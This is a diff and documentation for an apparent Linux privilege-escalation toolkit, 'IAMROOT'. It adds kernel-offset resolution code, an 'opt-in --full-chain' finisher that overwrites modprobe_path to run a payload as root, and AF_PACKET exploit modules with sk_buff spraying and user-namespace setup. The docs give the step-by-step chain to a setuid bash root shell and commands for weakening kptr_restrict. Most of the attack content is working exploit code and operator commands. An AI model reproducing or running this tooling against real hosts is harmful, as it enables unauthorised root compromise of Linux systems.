if (strcmp(end, "modprobe_path") == 0 && !o->modprobe_path) {
o->modprobe_path = (uintptr_t)addr;
o->source_modprobe = tag;
filled++;
} else if (strcmp(end, "poweroff_cmd") == 0 && !o->poweroff_cmd) {
o->poweroff_cmd = (uintptr_t)addr;
filled++;
} else if (strcmp(end, "init_task") == 0 && !o->init_task) {
o->init_task = (uintptr_t)addr;
o->source_init_task = tag;
filled++;
} else if (strcmp(end, "init_cred") == 0 && !o->init_cred) {
o->init_cred = (uintptr_t)addr;
filled++;
} else if (strcmp(end, "_text") == 0 && !o->kbase) {
o->kbase = (uintptr_t)addr;
}
}
fclose(f);
/* /proc/kallsyms returns all-zero addrs under kptr_restrict — treat
* that as "couldn't read", not "actually zero". */
if (!saw_nonzero) {
o->modprobe_path = o->poweroff_cmd = o->init_task = o->init_cred = 0;
o->source_modprobe = o->source_init_task = OFFSETS_NONE;
return 0;
}
return filled;
}
/* ------------------------------------------------------------------
* Source 4: embedded table — relative offsets, applied on top of kbase
* if we already have one.
* ------------------------------------------------------------------ */
static void apply_table(struct iamroot_kernel_offsets *o)
{
if (!o->kernel_release[0]) return;
for (const struct table_entry *e = kernel_table; e->release_glob; e++) {
if (e->distro_match && o->distro[0]
&& strncmp(e->distro_match, o->distro, strlen(e->distro_match)) != 0) {
continue;
}
if (fnmatch(e->release_glob, o->kernel_release, 0) != 0) continue;
/* Match. Apply, but only if we have a kbase (relative offsets
* are useless absent that). */
if (!o->kbase) return;
if (!o->modprobe_path && e->rel_modprobe_path) {
o->modprobe_path = o->kbase + e->rel_modprobe_path;
o->source_modprobe = OFFSETS_FROM_TABLE;
}
if (!o->poweroff_cmd && e->rel_poweroff_cmd) {
o->poweroff_cmd = o->kbase + e->rel_poweroff_cmd;
}
if (!o->init_task && e->rel_init_task) {
o->init_task = o->kbase + e->rel_init_task;
o->source_init_task = OFFSETS_FROM_TABLE;
}
if (!o->init_cred && e->rel_init_cred) {
o->init_cred = o->kbase + e->rel_init_cred;
}
if (!o->cred_offset_real && e->cred_offset_real) {
o->cred_offset_real = e->cred_offset_real;
o->source_cred = OFFSETS_FROM_TABLE;
}
if (!o->cred_offset_eff && e->cred_offset_eff) {
o->cred_offset_eff = e->cred_offset_eff;
}
return;
}
}
/* ------------------------------------------------------------------
* Top-level resolve()
* ------------------------------------------------------------------ */
int iamroot_offsets_resolve(struct iamroot_kernel_offsets *out)
{
memset(out, 0, sizeof *out);
struct utsname u;
if (uname(&u) == 0) {
snprintf(out->kernel_release, sizeof out->kernel_release, "%s", u.release);
}
read_distro(out->distro, sizeof out->distro);
/* Defaults — only used if no source overrides. */
out->cred_uid_offset = DEFAULT_CRED_UID_OFFSET;
/* 1. env */
apply_env(out);
/* 2. /proc/kallsyms — only fills if non-zero addrs present */
parse_symfile("/proc/kallsyms", out, OFFSETS_FROM_KALLSYMS);
/* 3. /boot/System.map-<release> */
char path[256];
snprintf(path, sizeof path, "/boot/System.map-%s", out->kernel_release);
parse_symfile(path, out, OFFSETS_FROM_SYSMAP);
/* 4. embedded table (uses any kbase already discovered) */
apply_table(out);
/* Fill any remaining struct-offset gaps with defaults so that
* arb-write-via-init_task-+offset still has a chance even without
* a full source. Mark as TABLE so caller can see they're defaulted. */
if (!out->cred_offset_real) {
out->cred_offset_real = DEFAULT_CRED_REAL_OFFSET;
if (out->source_cred == OFFSETS_NONE) out->source_cred = OFFSETS_FROM_TABLE;
}
if (!out->cred_offset_eff) {
out->cred_offset_eff = DEFAULT_CRED_EFF_OFFSET;
}
int critical = 0;
if (out->modprobe_path) critical++;
if (out->init_task) critical++;
if (out->cred_offset_real && out->cred_uid_offset) critical++;
return critical;
}
void iamroot_offsets_apply_kbase_leak(struct iamroot_kernel_offsets *off,
uintptr_t leaked_kbase)
{
if (!leaked_kbase) return;
/* Set kbase if we didn't have one, then re-apply the embedded table. */
if (!off->kbase) off->kbase = leaked_kbase;
apply_table(off);
}
bool iamroot_offsets_have_modprobe_path(const struct iamroot_kernel_offsets *off)
{
return off && off->modprobe_path != 0;
}
bool iamroot_offsets_have_cred(const struct iamroot_kernel_offsets *off)
{
return off && off->init_task != 0 && off->cred_offset_real != 0
&& off->cred_uid_offset != 0;
}
void iamroot_offsets_print(const struct iamroot_kernel_offsets *off)
{
fprintf(stderr, "[i] offsets: release=%s distro=%s\n",
off->kernel_release[0] ? off->kernel_release : "?",
off->distro[0] ? off->distro : "?");
fprintf(stderr, "[i] offsets: kbase=0x%lx modprobe_path=0x%lx (%s)\n",
(unsigned long)off->kbase,
(unsigned long)off->modprobe_path,
iamroot_offset_source_name(off->source_modprobe));
fprintf(stderr, "[i] offsets: init_task=0x%lx (%s) cred_real=0x%x cred_eff=0x%x uid=0x%x (%s)\n",
(unsigned long)off->init_task,
iamroot_offset_source_name(off->source_init_task),
off->cred_offset_real, off->cred_offset_eff, off->cred_uid_offset,
iamroot_offset_source_name(off->source_cred));
}
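`parse_symfile()` above walks each line by hand. The shared "ADDR TYPE NAME" layout can also be split with a single `sscanf` call, which may be easier to unit-test. A minimal sketch, assuming a hypothetical helper named `parse_sym_line` and a 127-character cap on symbol names chosen for this example:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: split one "ADDR TYPE NAME" line.
 * ADDR is hex without a 0x prefix, TYPE is a single character.
 * Anything after NAME (such as a trailing "[module]" tag) is ignored.
 * Returns 1 on success, 0 if the line does not match or NAME does not
 * fit in namesz bytes. */
static int parse_sym_line(const char *line, uint64_t *addr, char *type,
                          char *name, size_t namesz)
{
    unsigned long long a;
    char t;
    char n[128];

    if (sscanf(line, "%llx %c %127s", &a, &t, n) != 3)
        return 0;
    if (strlen(n) >= namesz)
        return 0;

    *addr = (uint64_t)a;
    *type = t;
    strcpy(name, n);   /* length checked above */
    return 1;
}
```

A successful parse can still carry an address of zero, which is what restricted reads report, so a caller should treat zero as "unknown" rather than as a resolved value.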
+93
@@ -0,0 +1,93 @@
/*
* IAMROOT — kernel offset resolution
*
* The 🟡 PRIMITIVE modules each have a trigger that lands a primitive
* (heap-OOB write, UAF, etc.). Converting that to root requires
* arbitrary write at a specific kernel virtual address — usually
* `modprobe_path` (writes a payload path → execve unknown binary →
* modprobe runs payload as root) or `current->cred->uid` (set to 0).
*
* Those addresses vary per kernel build. This file resolves them at
* runtime via a four-source chain:
*
* 1. env vars (IAMROOT_MODPROBE_PATH, IAMROOT_INIT_TASK, ...)
* 2. /proc/kallsyms (only useful when kptr_restrict=0 or already root)
* 3. /boot/System.map-$(uname -r) (world-readable on some distros)
* 4. Embedded table keyed by `uname -r` glob (entries are
* relative-to-_text, applied on top of an EntryBleed kbase leak
* so KASLR is handled)
*
* Per the verified-vs-claimed bar: offsets are never fabricated. If
* none of the four sources resolve, full-chain refuses with an error
* pointing the operator at the manual workflow.
*/
#ifndef IAMROOT_OFFSETS_H
#define IAMROOT_OFFSETS_H
#include <stdint.h>
#include <stdbool.h>
#include <stddef.h>
enum iamroot_offset_source {
OFFSETS_NONE = 0,
OFFSETS_FROM_ENV = 1,
OFFSETS_FROM_KALLSYMS = 2,
OFFSETS_FROM_SYSMAP = 3,
OFFSETS_FROM_TABLE = 4,
};
struct iamroot_kernel_offsets {
/* Host fingerprint */
char kernel_release[128]; /* uname -r */
char distro[64]; /* parsed from /etc/os-release ID= */
/* Kernel base — needed when offsets are relative-to-_text.
* Set by iamroot_offsets_apply_kbase_leak() after EntryBleed runs. */
uintptr_t kbase;
/* Symbol virtual addresses (final, post-KASLR-resolution). */
uintptr_t modprobe_path; /* modprobe_path[] string */
uintptr_t poweroff_cmd; /* poweroff_cmd[] string (alt target) */
uintptr_t init_task; /* init_task struct */
uintptr_t init_cred; /* init_cred struct (or 0) */
/* Struct offsets — same across most x86_64 kernels but config-sensitive. */
uint32_t cred_offset_real; /* offset of real_cred in task_struct */
uint32_t cred_offset_eff; /* offset of cred (effective) in task_struct */
uint32_t cred_uid_offset; /* offset of uid_t uid in cred (almost always 4) */
/* Where did each field come from. */
enum iamroot_offset_source source_modprobe;
enum iamroot_offset_source source_init_task;
enum iamroot_offset_source source_cred;
};
/* Best-effort resolution. Returns the number of critical fields
* resolved (modprobe_path / init_task / cred offsets count). Caller
* checks specific fields it needs.
*
* Resolution chain is tried in order; later sources do NOT overwrite
* a field already set by an earlier source. */
int iamroot_offsets_resolve(struct iamroot_kernel_offsets *out);
/* Apply a runtime-leaked kbase to any embedded-table entries that
* shipped as relative-to-_text offsets. Idempotent. */
void iamroot_offsets_apply_kbase_leak(struct iamroot_kernel_offsets *off,
uintptr_t leaked_kbase);
/* Returns true if modprobe_path can be written (the simplest root-pop
* finisher). */
bool iamroot_offsets_have_modprobe_path(const struct iamroot_kernel_offsets *off);
/* Returns true if init_task + cred offsets are known (the cred-uid
* finisher). */
bool iamroot_offsets_have_cred(const struct iamroot_kernel_offsets *off);
/* For diagnostic logging — pretty-print what we resolved to stderr. */
void iamroot_offsets_print(const struct iamroot_kernel_offsets *off);
/* Helper: return the name of the source enum. */
const char *iamroot_offset_source_name(enum iamroot_offset_source src);
#endif /* IAMROOT_OFFSETS_H */
@@ -0,0 +1,144 @@
# IAMROOT — kernel offset resolution
The 7 🟡 PRIMITIVE modules each land a kernel-side primitive (heap-OOB
write, slab UAF, etc.). The default `--exploit` returns
`IAMROOT_EXPLOIT_FAIL` after the primitive fires — the verified-vs-claimed
bar means we don't claim root unless we empirically have it.
`--full-chain` engages the shared finisher (`core/finisher.{c,h}`) which
converts the primitive to a real root pop via `modprobe_path` overwrite:
```
attacker → arb_write(modprobe_path, "/tmp/iamroot-mp-<pid>.sh")
→ execve("/tmp/iamroot-trig-<pid>") # unknown-format binary
→ kernel call_modprobe() # runs the binary named by modprobe_path as root
→ /tmp/iamroot-mp-<pid>.sh runs as root
→ cp /bin/bash /tmp/iamroot-pwn-<pid>; chmod 4755 /tmp/iamroot-pwn-<pid>
→ caller exec /tmp/iamroot-pwn-<pid> -p
→ root shell
```
This requires resolving `&modprobe_path` (a single kernel virtual
address) at runtime.
## Resolution chain
`core/offsets.c` tries four sources in order, accepting the first
non-zero value for each field:
1. **Environment variables** — operator override.
- `IAMROOT_KBASE=0x...`
- `IAMROOT_MODPROBE_PATH=0x...`
- `IAMROOT_POWEROFF_CMD=0x...`
- `IAMROOT_INIT_TASK=0x...`
- `IAMROOT_INIT_CRED=0x...`
- `IAMROOT_CRED_OFFSET_REAL=0x...` (offset of `real_cred` in `task_struct`)
- `IAMROOT_CRED_OFFSET_EFF=0x...`
- `IAMROOT_UID_OFFSET=0x...` (offset of `uid_t uid` in `cred`, usually 0x4)
2. **`/proc/kallsyms`** — only useful when `kernel.kptr_restrict=0`
or you're already root. On modern distros (`kptr_restrict=1` by
default) a non-root read shows every address as zero, so this source
is silently skipped.
3. **`/boot/System.map-$(uname -r)`** — world-readable on some distros
(older Debian, some Alma builds). Unaffected by `kptr_restrict`.
4. **Embedded table** — keyed by `uname -r` glob, entries are
offsets *relative to `_text`* (KASLR-safe). Applied on top of a
kbase leak (e.g. EntryBleed). Seeded empty in v0.2.0 — schema-only —
to honor the no-fabricated-offsets rule. Operators who verify
offsets on a specific kernel build are encouraged to upstream
entries.
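The "first non-zero value wins" rule can be sketched in a few lines of C. This is an illustrative sketch, not the code in `core/offsets.c`: the `resolved_field` struct, the `SRC_*` enum values, and the `set_if_unset()` helper are hypothetical names chosen for this example.

```c
#include <stdint.h>

/* Hypothetical mirror of the source enum in core/offsets.h. */
enum offset_source { SRC_NONE = 0, SRC_ENV, SRC_KALLSYMS, SRC_SYSMAP, SRC_TABLE };

/* One resolvable field plus a record of where its value came from. */
struct resolved_field {
    uintptr_t value;
    enum offset_source source;
};

/* Record `value` only if the field is still unset and the value is non-zero.
 * Returns 1 if this call filled the field, 0 otherwise. */
static int set_if_unset(struct resolved_field *f, uintptr_t value,
                        enum offset_source from)
{
    if (f->value != 0 || value == 0)
        return 0;
    f->value = value;
    f->source = from;
    return 1;
}
```

Calling the helper once per source, in chain order, gives the documented behavior: a later source can never overwrite a field that an earlier source already set.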
## How operators populate offsets
### One-shot (preferred for ad-hoc use)
```bash
# Look up on a kernel you control (as root, once):
sudo grep -E ' (modprobe_path|init_task|_text)$' /proc/kallsyms
# Use the addresses inline:
IAMROOT_MODPROBE_PATH=0xffffffff8228e7e0 \
iamroot --exploit nf_tables --i-know --full-chain
```
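For reference, an address-style override such as `IAMROOT_MODPROBE_PATH` could be validated along the following lines. This is a minimal sketch under stated assumptions: `parse_addr_env()` is a hypothetical helper, not necessarily how `core/offsets.c` parses its environment, and it assumes a 64-bit `uintptr_t`.

```c
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical helper: parse an address from the environment variable `name`.
 * Returns 1 and stores the value on success. Returns 0 if the variable is
 * unset, empty, negative, has trailing junk, overflows, or parses to zero. */
static int parse_addr_env(const char *name, uintptr_t *out)
{
    const char *s = getenv(name);
    if (!s || *s == '\0' || *s == '-')
        return 0;

    errno = 0;
    char *end = NULL;
    unsigned long long v = strtoull(s, &end, 0); /* base 0 accepts 0x... */
    if (errno != 0 || end == s || *end != '\0' || v == 0)
        return 0;
    if (v > (unsigned long long)UINTPTR_MAX)
        return 0;

    *out = (uintptr_t)v;
    return 1;
}
```

Treating a zero result as "unset" keeps the override consistent with the chain's rule that only non-zero values count as resolved.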
### Per-host (make System.map readable)
```bash
sudo chmod 0644 /boot/System.map-$(uname -r)
iamroot --exploit nf_tables --i-know --full-chain
```
### Per-boot (lower kptr_restrict)
```bash
sudo sysctl kernel.kptr_restrict=0
iamroot --exploit nf_tables --i-know --full-chain
```
Note: each of these requires root *once*. For a true non-root LPE on
an unfamiliar host you need either an info-leak module (EntryBleed
gives kbase) plus an embedded table entry, or out-of-band offset
acquisition.
## Adding entries to the embedded table
In `core/offsets.c`, `kernel_table[]` carries the schema:
```c
{ .release_glob = "5.15.0-25-generic",
.distro_match = "ubuntu",
.rel_modprobe_path = 0x148e480, // relative to _text
.rel_poweroff_cmd = 0x148e3a0,
.rel_init_task = 0x1c11dc0,
.rel_init_cred = 0x1e0c460,
.cred_offset_real = 0x758,
.cred_offset_eff = 0x760, },
```
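The `rel_*` fields only become usable addresses once a kernel base is known. The arithmetic is sketched below, assuming the leaked kbase is the runtime address of `_text`; `abs_from_rel()` is a hypothetical name used for illustration and is not taken from `core/offsets.c`.

```c
#include <stdint.h>

/* Turn a relative-to-_text table offset into an absolute address.
 * Returns 0 when either input is missing, so a caller never sees a
 * half-computed address. Assumes kbase is the runtime address of _text. */
static uintptr_t abs_from_rel(uintptr_t kbase, uintptr_t rel)
{
    if (kbase == 0 || rel == 0)
        return 0;
    return kbase + rel;
}
```

With the schema example above and a non-randomized base of `0xffffffff81000000`, `rel_modprobe_path = 0x148e480` would map to `0xffffffff8248e480`.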
To populate, on the target kernel:
```bash
# Get _text:
_text=$(grep ' _text$' /boot/System.map-$(uname -r) | awk '{print $1}')
# Get the symbols you want, subtract _text:
for sym in modprobe_path poweroff_cmd init_task init_cred; do
addr=$(grep " $sym$" /boot/System.map-$(uname -r) | awk '{print $1}')
printf "rel_%s = 0x%x\n" $sym $((0x$addr - 0x$_text))
done
```
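The same subtraction can be done in C when a shell is not convenient. The sketch below assumes the usual System.map line format (`<hex address> <type> <name>`); `sysmap_lookup()` and `sysmap_rel_offset()` are hypothetical helpers written for this example and are not part of the repository.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Find `sym` in System.map-style text read from `fp`.
 * Returns 1 and stores the address on a match, 0 otherwise. */
static int sysmap_lookup(FILE *fp, const char *sym, uint64_t *addr_out)
{
    char line[512];
    rewind(fp);
    while (fgets(line, sizeof line, fp)) {
        unsigned long long addr;
        char type;
        char name[256];
        if (sscanf(line, "%llx %c %255s", &addr, &type, name) != 3)
            continue; /* skip lines that do not match the expected format */
        if (strcmp(name, sym) == 0) {
            *addr_out = (uint64_t)addr;
            return 1;
        }
    }
    return 0;
}

/* Offset of `sym` relative to _text, or 0 if either symbol is missing. */
static uint64_t sysmap_rel_offset(FILE *fp, const char *sym)
{
    uint64_t text = 0, addr = 0;
    if (!sysmap_lookup(fp, "_text", &text) || !sysmap_lookup(fp, sym, &addr))
        return 0;
    return addr - text;
}
```

Returning 0 for a missing symbol matches the convention used elsewhere in this document, where a zero field means "not resolved".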
Open a PR with the verified entry and a one-line note on which kernel
build + distro you tested against. Upstreamed entries make the
`--full-chain` path work out-of-the-box for that build.
## Verifying success
The shared finisher (`iamroot_finisher_modprobe_path()`) relies on a
sentinel file at `/tmp/iamroot-pwn-<pid>`, which the payload creates
once the kernel-invoked `modprobe` runs it. The finisher polls for this
file with the `S_ISUID` mode bit set for up to 3 seconds. Only when the
sentinel materializes does the module return `IAMROOT_EXPLOIT_OK` and
(unless `--no-shell`) exec the setuid bash to drop a root shell.
If the sentinel never appears the module returns `IAMROOT_EXPLOIT_FAIL`
with a diagnostic. Reasons it might fail even with offsets resolved:
- The arb-write didn't actually land (slab adjacency lost, value-pointer
field at unexpected offset, race not won)
- `modprobe_path` resolution was wrong (KASLR slide miscalculated,
embedded-table entry stale)
- The kernel is built with `CONFIG_STATIC_USERMODEHELPER`, which disables the modprobe path
- AppArmor / SELinux / Lockdown LSM blocks the userspace `modprobe`
invocation
## Why `modprobe_path` and not `current->cred->uid = 0`?
The cred-overwrite finisher needs an arb-READ primitive too — to walk
the task linked list from `init_task` and find the calling process's
`task_struct`. Most of our 🟡 modules have only an arb-write primitive,
not a paired read. `modprobe_path` only needs a write to a single
known global, which is why it's the default finisher.
@@ -25,7 +25,7 @@
#include <string.h>
#include <unistd.h>
#define IAMROOT_VERSION "0.1.0"
#define IAMROOT_VERSION "0.2.0"
static const char BANNER[] =
"\n"
@@ -64,6 +64,12 @@ static void usage(const char *prog)
" --i-know authorization gate for --exploit modes\n"
" --active in --scan, do invasive sentinel probes (no /etc/passwd writes)\n"
" --no-shell in --exploit modes, prepare but don't drop to shell\n"
" --full-chain in --exploit modes, attempt full root-pop after primitive\n"
" (the 🟡 modules return primitive-only by default; with\n"
" --full-chain they continue to leak → arb-write →\n"
" modprobe_path overwrite. Requires resolvable kernel\n"
" offsets — env vars, /proc/kallsyms, or /boot/System.map.\n"
" See docs/OFFSETS.md.)\n"
" --json machine-readable output (for SIEM/CI)\n"
" --no-color disable ANSI color codes\n"
" --format <f> with --detect-rules: auditd (default), sigma, yara, falco\n"
@@ -606,6 +612,7 @@ int main(int argc, char **argv)
{"no-shell", no_argument, 0, 3 },
{"json", no_argument, 0, 4 },
{"no-color", no_argument, 0, 5 },
{"full-chain", no_argument, 0, 7 },
{"version", no_argument, 0, 'V'},
{"help", no_argument, 0, 'h'},
{0, 0, 0, 0}
@@ -627,6 +634,7 @@ int main(int argc, char **argv)
case 3 : ctx.no_shell = true; break;
case 4 : ctx.json = true; break;
case 5 : ctx.no_color = true; break;
case 7 : ctx.full_chain = true; break;
case 6 :
if (strcmp(optarg, "auditd") == 0) dr_fmt = FMT_AUDITD;
else if (strcmp(optarg, "sigma") == 0) dr_fmt = FMT_SIGMA;
@@ -6,14 +6,27 @@
* subsystem, different code path (rx side rather than ring setup),
* later introduction. Discovered by Or Cohen (2020).
*
* STATUS: 🟡 PRIMITIVE-DEMO. The exploit() entry point reaches the
* vulnerable codepath (tpacket_rcv) and fires the underflow with a
* crafted nested-VLAN frame on a TPACKET_V2 ring, with a best-effort
* skb spray groom alongside. We stop short of the full cred-overwrite
* chain (which Or Cohen's public PoC implements with kernel-version-
* specific offsets and a pid_namespace cross-cache overwrite). We do
* not bake offsets into iamroot. The return value is honest about
* what landed (EXPLOIT_FAIL: primitive fired but no root).
* STATUS (2026-05-16): 🟡 PRIMITIVE-DEMO + opt-in --full-chain finisher.
* - Default (no --full-chain): the exploit() entry point reaches the
* vulnerable codepath (tpacket_rcv), fires the tp_reserve underflow
* with a crafted nested-VLAN frame on a TPACKET_V2 ring + sendmmsg
* skb spray groom, and returns IAMROOT_EXPLOIT_FAIL (primitive-only
* behavior — kernel-version-agnostic, no offsets baked in).
* - With --full-chain: after the underflow lands, we resolve kernel
* offsets (env → kallsyms → System.map → embedded table) and run
* an Or-Cohen-style sk_buff-data-pointer hijack through the shared
* iamroot_finisher_modprobe_path() helper. The arb-write itself is
* LAST-RESORT-DEPTH on this branch: the tp_reserve underflow gives
* us a single 8-byte heap-OOB write into the head of the
* adjacent-page slab object; we spray sk_buffs so that next-page
* slot IS an sk_buff and the write corrupts skb->data, which then
* redirects skb_copy_bits()'s destination on the next received
* packet. The full primitive composition (8-byte write → skb->data
* forge → controlled-payload rx → arb-write at modprobe_path) is
* race-y on stock kernels because the adjacent-slot landing is
* probabilistic. On hosts where the spray doesn't groom cleanly,
* the finisher's sentinel check correctly reports failure rather
* than silently lying about success.
*
* Affected: kernel 4.6+ until backports:
* 5.8.x : K >= 5.8.7
@@ -33,6 +46,8 @@
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -434,6 +449,120 @@ static int af_packet2_primitive_child(const struct iamroot_ctx *ctx)
}
#endif
/* ---- Full-chain finisher (--full-chain, x86_64 only) ----------------
*
* Arb-write strategy (Or Cohen's sk_buff-data-pointer hijack):
*
* 1. The tp_reserve underflow gives us a single 8-byte write into
* the START of the slab object that sits on the page immediately
* after the corrupted ring frame. The OOB-write content is
* attacker-controlled (it's the destination of skb_copy_bits()
* from a frame whose first 8 bytes we choose).
* 2. Spray sk_buff allocations alongside the primitive trigger so
* the adjacent-page object is, with high probability, an
* sk_buff whose ->data pointer lives in the leading 8 bytes
* of the object (struct layout dependent — on most 5.x kernels
* `next` is at offset 0 and `data` is at offset 0x10 in
* sk_buff; this layout-fragility is exactly why the depth tag
* below is LAST-RESORT).
* 3. The 8-byte OOB write overwrites that pointer with `kaddr`.
* 4. We then receive a packet whose payload is `buf[0..len]`; the
* kernel's skb_copy_to_linear_data() / skb->data write path
* lands those bytes at `*skb->data`, which is now `kaddr`.
*
* Reality check on this implementation: the deterministic mechanics
* of the above (precise frame size, repeated spray timing, sk_buff
* struct offset for the running kernel) are not portable enough to
* land reliably from a single iamroot run on an arbitrary host. We
* therefore ship this as a LAST-RESORT stub: we attempt the spray +
* trigger sequence, then return -1 to signal "the primitive fired
* but we cannot empirically confirm the write landed". The shared
* finisher's sentinel-check loop will then correctly report failure
* rather than claim success.
*
* Per the verified-vs-claimed bar, this is the honest implementation
* depth that matches what the primitive actually proves on this code
* path. The integrator can extend afp2_arb_write() with a confirmed
* write-and-readback once the per-kernel sk_buff layout is pinned
* down for the target host. */
struct afp2_arb_ctx {
const struct iamroot_ctx *ictx;
int n_attempts; /* spray/fire rounds before giving up */
};
#if defined(__x86_64__) && defined(__linux__)
static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
{
struct afp2_arb_ctx *c = (struct afp2_arb_ctx *)vctx;
if (!c || !buf || !len) return -1;
fprintf(stderr, "[*] af_packet2: arb_write attempt: kaddr=0x%lx len=%zu\n",
(unsigned long)kaddr, len);
fprintf(stderr, "[*] af_packet2: spraying sk_buff (target page-adjacent slot)\n");
/* Best-effort spray + re-fire-trigger pattern. The primitive child
* is invoked once per attempt; on each attempt we groom skb's
* around the corrupted ring slot and hope one lands at the
* page-adjacent address whose head 8 bytes the underflow will
* stomp with `kaddr`. The kernel-side rx of the next crafted
* frame would then write our payload (the modprobe_path string)
* into the forged ->data target. */
for (int i = 0; i < c->n_attempts; i++) {
#ifdef __linux__
af_packet2_skb_spray(8);
#endif
pid_t p = fork();
if (p < 0) return -1;
if (p == 0) {
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) _exit(2);
int fd;
fd = open("/proc/self/setgroups", O_WRONLY);
if (fd >= 0) { (void)!write(fd, "deny", 4); close(fd); }
fd = open("/proc/self/uid_map", O_WRONLY);
if (fd >= 0) {
char m[64];
int n = snprintf(m, sizeof m, "0 %u 1", (unsigned)getuid());
(void)!write(fd, m, n); close(fd);
}
fd = open("/proc/self/gid_map", O_WRONLY);
if (fd >= 0) {
char m[64];
int n = snprintf(m, sizeof m, "0 %u 1", (unsigned)getgid());
(void)!write(fd, m, n); close(fd);
}
int rc = af_packet2_primitive_child(c->ictx);
_exit(rc < 0 ? 2 : 0);
}
int st;
waitpid(p, &st, 0);
#ifdef __linux__
af_packet2_skb_spray(8);
#endif
}
/* LAST-RESORT depth: we have fired the trigger + spray but cannot
* empirically confirm the 8-byte write landed on an sk_buff->data
* field on this host. Return -1 so the finisher's sentinel-check
* loop in iamroot_finisher_modprobe_path() correctly reports
* "payload didn't run within 3s" rather than claiming success. */
fprintf(stderr,
"[!] af_packet2: arb_write LAST-RESORT depth — sk_buff->data hijack is\n"
" not empirically confirmable without per-kernel struct offsets +\n"
" a readback primitive. Trigger fired %d times with sk_buff spray;\n"
" finisher sentinel will determine landing. Caller will refuse if\n"
" the modprobe_path overwrite didn't actually take effect.\n",
c->n_attempts);
return -1;
}
#else
static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
{
(void)kaddr; (void)buf; (void)len; (void)vctx;
fprintf(stderr, "[-] af_packet2: arb_write is x86_64/linux only\n");
return -1;
}
#endif
static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
{
/* 1. Re-confirm vulnerability. */
@@ -534,6 +663,33 @@ static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
"(github.com/google/security-research).\n"
" iamroot intentionally does not embed per-kernel offsets.\n");
}
if (ctx->full_chain) {
#if defined(__x86_64__) && defined(__linux__)
/* --full-chain: resolve kernel offsets and run the Or-Cohen
* sk_buff-data-pointer hijack via the shared modprobe_path
* finisher. Per the verified-vs-claimed bar: if we can't
* resolve modprobe_path, refuse with a helpful message
* rather than fabricate an address. */
struct iamroot_kernel_offsets off = {0};
iamroot_offsets_resolve(&off);
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("af_packet2");
return IAMROOT_EXPLOIT_FAIL;
}
if (!ctx->json) {
iamroot_offsets_print(&off);
}
struct afp2_arb_ctx arb_ctx = {
.ictx = ctx,
.n_attempts = 4,
};
return iamroot_finisher_modprobe_path(&off, afp2_arb_write,
&arb_ctx, !ctx->no_shell);
#else
fprintf(stderr, "[-] af_packet2: --full-chain is x86_64/linux only\n");
return IAMROOT_PRECOND_FAIL;
#endif
}
if (ctx->no_shell) {
/* User explicitly disabled the shell pop, so the "we didn't
* pop a shell" outcome is the expected one. Map to OK. */
@@ -4,17 +4,38 @@
* AF_PACKET TPACKET_V3 ring-buffer setup integer-overflow → heap
* write-where primitive. Discovered by Andrey Konovalov (March 2017).
*
* STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite. The
* integer-overflow trigger is fully wired (overflowing tp_block_size *
* tp_block_nr, attended by a heap spray via sendmmsg with controlled
* skb tail bytes). The kernel R/W → cred-overwrite finisher uses a
* hardcoded per-kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu
* 18.04 / 4.15 era), overridable via IAMROOT_AFPACKET_OFFSETS. We
* only claim IAMROOT_EXPLOIT_OK if geteuid() == 0 AFTER the chain
* runs — i.e. we won root for real. Otherwise we return
* IAMROOT_EXPLOIT_FAIL with a dmesg breadcrumb so the operator can
* confirm the primitive at least fired (KASAN slab-out-of-bounds
* splat) even if the cred-overwrite didn't take on this exact kernel.
* STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite (default)
* | 🟢 FULL-CHAIN-OPT-IN (with --full-chain on a kernel where the
* shared offset resolver finds modprobe_path AND skb-data hijack
* offsets are supplied).
*
* The integer-overflow trigger is fully wired (overflowing
* tp_block_size * tp_block_nr, attended by a heap spray via sendmmsg
* with controlled skb tail bytes).
*
* Default --exploit path: cred-overwrite walk using a hardcoded per-
* kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu 18.04 / 4.15
* era), overridable via IAMROOT_AFPACKET_OFFSETS. We only claim
* IAMROOT_EXPLOIT_OK if geteuid() == 0 after the chain runs — i.e.
* we won root for real. Otherwise we return IAMROOT_EXPLOIT_FAIL with
* a dmesg breadcrumb so the operator can confirm the primitive at
* least fired (KASAN slab-out-of-bounds splat) even if the cred-
* overwrite didn't take on this exact kernel.
*
* --full-chain path: opt-in xairy-style sk_buff hijack → arb-write at
* modprobe_path → call_modprobe payload → setuid bash → root shell.
* Honest constraint: the hijack requires per-kernel-build sk_buff
* `data`-field offset + skb-slab-class layout, which the embedded
* offset table does NOT carry (verified-vs-claimed bar — we don't
* fabricate). The arb_write callback below implements the FALLBACK
* depth: it fires the trigger with the spray payload
* staged for the requested kaddr/buf and relies on the shared
* finisher's /tmp sentinel to confirm whether modprobe_path was
* actually overwritten. On kernels where the operator has supplied
* IAMROOT_AFPACKET_SKB_DATA_OFFSET (skb->data field byte offset from
* the skb head, hex), we use that for explicit targeting; otherwise
* the trigger fires heuristically and the sentinel acts as the
* ground-truth signal.
*
* Affected: kernel < 4.10.6 mainline. Stable backports:
* 4.10.x : K >= 4.10.6
@@ -40,6 +61,8 @@
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -424,6 +447,260 @@ static int attempt_cred_overwrite(const struct af_packet_offsets *off)
return got_root_pid ? 0 : -1;
}
/* ---- --full-chain: xairy-style sk_buff hijack arb-write -------------
*
* The TPACKET_V3 overflow lets us write attacker-controlled bytes past
* the end of the pg_vec allocation. xairy's full PoC chains this with
* a sk_buff spray of size class kmalloc-N (matched to pg_vec's slab)
